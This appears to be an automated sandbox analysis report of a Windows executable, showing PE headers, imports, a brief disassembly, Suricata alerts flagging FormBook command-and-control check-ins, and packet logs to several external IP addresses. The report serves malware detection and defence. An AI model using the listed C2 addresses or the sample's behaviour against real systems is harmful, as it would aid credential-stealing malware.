                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  call 00007F5780D8CFCBh
                                                                  jmp 00007F5780D83E3Eh
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [ebp+0Ch]
                                                                  mov ecx, dword ptr [ebp+10h]
                                                                  mov edi, dword ptr [ebp+08h]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
                                                                  cmp edi, esi
                                                                  jbe 00007F5780D83FBAh
                                                                  cmp edi, eax
                                                                  jc 00007F5780D84156h
                                                                  cmp ecx, 00000080h
                                                                  jc 00007F5780D83FCEh
                                                                  cmp dword ptr [004A9724h], 00000000h
                                                                  je 00007F5780D83FC5h
                                                                  push edi
                                                                  push esi
                                                                  and edi, 0Fh
                                                                  and esi, 0Fh
                                                                  cmp edi, esi
                                                                  pop esi
                                                                  pop edi
                                                                  jne 00007F5780D83FB7h
                                                                  jmp 00007F5780D84392h
                                                                  test edi, 00000003h
                                                                  jne 00007F5780D83FC6h
                                                                  shr ecx, 02h
                                                                  and edx, 03h
                                                                  cmp ecx, 08h
                                                                  jc 00007F5780D83FDBh
                                                                  rep movsd
                                                                  jmp dword ptr [00416740h+edx*4]
                                                                  mov eax, edi
                                                                  mov edx, 00000003h
                                                                  sub ecx, 04h
                                                                  jc 00007F5780D83FBEh
                                                                  and eax, 03h
                                                                  add ecx, eax
                                                                  jmp dword ptr [00416654h+eax*4]
                                                                  jmp dword ptr [00416750h+ecx*4]
                                                                  nop
                                                                  jmp dword ptr [004166D4h+ecx*4]
                                                                  nop
                                                                  inc cx
                                                                  add byte ptr [eax-4BFFBE9Ah], dl
                                                                  inc cx
                                                                  add byte ptr [ebx], ah
                                                                  ror dword ptr [edx-75F877FAh], 1
                                                                  inc esi
                                                                  add dword ptr [eax+468A0147h], ecx
                                                                  add al, cl
                                                                  jmp 00007F57831FC7B7h
                                                                  add esi, 03h
                                                                  add edi, 03h
                                                                  cmp ecx, 08h
                                                                  jc 00007F5780D83F7Eh
                                                                  rep movsd
                                                                  jmp dword ptr [00000000h+edx*4]

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS2010 SP1 build 40219
                                                                  • [C++] VS2010 SP1 build 40219
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ASM] VS2010 SP1 build 40219
                                                                  • [RES] VS2010 SP1 build 40219
                                                                  • [LNK] VS2010 SP1 build 40219

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                  RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                  RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                  RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                  RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                  RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                  RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                  RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                  RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                  RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                  RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                  RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                  RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                  RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                  RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                  RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                  RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                  RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                  RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                  RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                  RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                  RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                  RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                  RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                  RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                  RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                  RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                  Imports

                                                                  DLLImport
                                                                  WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                  VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                  COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                  MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                  PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                  USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                  KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                  USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                  GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                  ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                  ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                  OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishGreat Britain
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-11-18T13:12:53.485931+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75311547.76.213.19780TCP
                                                                  2024-11-18T13:13:09.437341+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75314913.248.169.4880TCP
                                                                  2024-11-18T13:13:11.999199+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75315013.248.169.4880TCP
                                                                  2024-11-18T13:13:14.530180+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75315113.248.169.4880TCP
                                                                  2024-11-18T13:13:17.093699+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75315213.248.169.4880TCP
                                                                  2024-11-18T13:13:23.094046+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753153176.117.73.10480TCP
                                                                  2024-11-18T13:13:25.812830+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753154176.117.73.10480TCP
                                                                  2024-11-18T13:13:28.640925+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753155176.117.73.10480TCP
                                                                  2024-11-18T13:13:31.532538+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.753156176.117.73.10480TCP
                                                                  2024-11-18T13:13:37.411117+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75315713.248.169.4880TCP
                                                                  2024-11-18T13:13:39.960092+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75315813.248.169.4880TCP
                                                                  2024-11-18T13:13:42.463269+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75315913.248.169.4880TCP
                                                                  2024-11-18T13:13:45.053482+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75316013.248.169.4880TCP
                                                                  2024-11-18T13:13:51.201404+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753161107.167.84.4280TCP
                                                                  2024-11-18T13:13:53.754465+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753162107.167.84.4280TCP
                                                                  2024-11-18T13:13:56.424552+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753163107.167.84.4280TCP
                                                                  2024-11-18T13:13:59.085864+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.753164107.167.84.4280TCP
                                                                  2024-11-18T13:14:05.141058+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753165176.32.38.13080TCP
                                                                  2024-11-18T13:14:07.781687+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753166176.32.38.13080TCP
                                                                  2024-11-18T13:14:10.517191+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753167176.32.38.13080TCP
                                                                  2024-11-18T13:14:13.078566+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.753168176.32.38.13080TCP
                                                                  2024-11-18T13:14:19.154386+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753169161.97.142.14480TCP
                                                                  2024-11-18T13:14:21.698796+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753170161.97.142.14480TCP
                                                                  2024-11-18T13:14:24.360270+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753171161.97.142.14480TCP
                                                                  2024-11-18T13:14:27.024295+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.753172161.97.142.14480TCP
                                                                  2024-11-18T13:14:33.633607+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753173203.161.46.20580TCP
                                                                  2024-11-18T13:14:36.188442+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753174203.161.46.20580TCP
                                                                  2024-11-18T13:14:38.756479+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.753175203.161.46.20580TCP
                                                                  2024-11-18T13:14:41.324493+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.753176203.161.46.20580TCP
                                                                  2024-11-18T13:14:48.594377+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75317720.2.36.11280TCP
                                                                  2024-11-18T13:14:51.141237+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75317820.2.36.11280TCP
                                                                  2024-11-18T13:14:53.656857+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75317920.2.36.11280TCP
                                                                  2024-11-18T13:14:56.235004+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75318020.2.36.11280TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 18, 2024 13:12:52.453747034 CET5311580192.168.2.747.76.213.197
                                                                  Nov 18, 2024 13:12:52.458596945 CET805311547.76.213.197192.168.2.7
                                                                  Nov 18, 2024 13:12:52.458707094 CET5311580192.168.2.747.76.213.197
                                                                  Nov 18, 2024 13:12:52.512556076 CET5311580192.168.2.747.76.213.197
                                                                  Nov 18, 2024 13:12:52.517467976 CET805311547.76.213.197192.168.2.7
                                                                  Nov 18, 2024 13:12:53.441814899 CET805311547.76.213.197192.168.2.7
                                                                  Nov 18, 2024 13:12:53.485930920 CET5311580192.168.2.747.76.213.197
                                                                  Nov 18, 2024 13:12:53.637706041 CET805311547.76.213.197192.168.2.7
                                                                  Nov 18, 2024 13:12:53.637888908 CET5311580192.168.2.747.76.213.197
                                                                  Nov 18, 2024 13:12:53.642390013 CET5311580192.168.2.747.76.213.197
                                                                  Nov 18, 2024 13:12:53.647726059 CET805311547.76.213.197192.168.2.7
                                                                  Nov 18, 2024 13:13:08.740921974 CET5314980192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:08.745994091 CET805314913.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:08.746154070 CET5314980192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:08.760742903 CET5314980192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:08.765774965 CET805314913.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:09.437261105 CET805314913.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:09.437340975 CET5314980192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:10.266155958 CET5314980192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:10.271307945 CET805314913.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:11.292529106 CET5315080192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:11.297595978 CET805315013.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:11.297796965 CET5315080192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:11.312334061 CET5315080192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:11.317344904 CET805315013.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:11.999111891 CET805315013.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:11.999198914 CET5315080192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:12.828701019 CET5315080192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:12.833832026 CET805315013.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:13.847521067 CET5315180192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:13.852547884 CET805315113.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:13.852653980 CET5315180192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:13.867085934 CET5315180192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:13.872143984 CET805315113.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:13.872186899 CET805315113.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:14.530010939 CET805315113.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:14.530179977 CET5315180192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:15.375399113 CET5315180192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:15.380347013 CET805315113.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:16.394114971 CET5315280192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:16.399259090 CET805315213.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:16.399386883 CET5315280192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:16.408215046 CET5315280192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:16.414262056 CET805315213.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:17.060798883 CET805315213.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:17.093553066 CET805315213.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:17.093698978 CET5315280192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:17.094763994 CET5315280192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:17.101082087 CET805315213.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:22.195954084 CET5315380192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:22.200896978 CET8053153176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:22.201041937 CET5315380192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:22.397254944 CET5315380192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:22.402333975 CET8053153176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:23.041517973 CET8053153176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:23.094046116 CET5315380192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:23.161762953 CET8053153176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:23.161833048 CET5315380192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:23.906706095 CET5315380192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:24.931166887 CET5315480192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:24.936213017 CET8053154176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:24.936342955 CET5315480192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:24.992558002 CET5315480192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:24.997539043 CET8053154176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:25.766143084 CET8053154176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:25.812829971 CET5315480192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:26.172859907 CET8053154176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:26.173041105 CET5315480192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:26.173152924 CET8053154176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:26.173226118 CET5315480192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:26.500726938 CET5315480192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:27.520338058 CET5315580192.168.2.7176.117.73.104
